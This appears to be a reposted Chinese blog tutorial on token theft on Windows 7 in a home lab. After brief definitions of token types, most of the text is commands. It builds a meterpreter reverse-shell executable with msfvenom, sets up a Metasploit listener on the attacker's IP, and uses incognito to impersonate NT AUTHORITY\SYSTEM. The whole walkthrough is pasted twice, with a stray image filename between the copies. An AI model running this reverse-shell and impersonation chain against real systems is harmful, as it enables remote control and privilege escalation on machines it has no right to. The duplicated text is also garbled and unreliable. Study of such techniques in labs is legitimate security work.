Windows7令牌窃取

2021/8/31 7:07:48

本文主要是介绍Windows7令牌窃取,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

令牌(token)

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。

复现准备

靶机:Windows7 192.168.1.15

攻击机:Kali 2021 192.168.1.16

生成反弹Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻击

获取监听

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

打开靶机,双击生成的Shell,然后kali获取到反弹的shell

# 进入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

image-20210824185124692# Windows7令牌窃取

令牌(token)

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。

复现准备

靶机:Windows7 192.168.1.15

攻击机:Kali 2021 192.168.1.16

生成反弹Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻击

获取监听

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

打开靶机,双击生成的Shell,然后kali获取到反弹的shell

# 进入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

image-20210824185124692



这篇关于Windows7令牌窃取的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程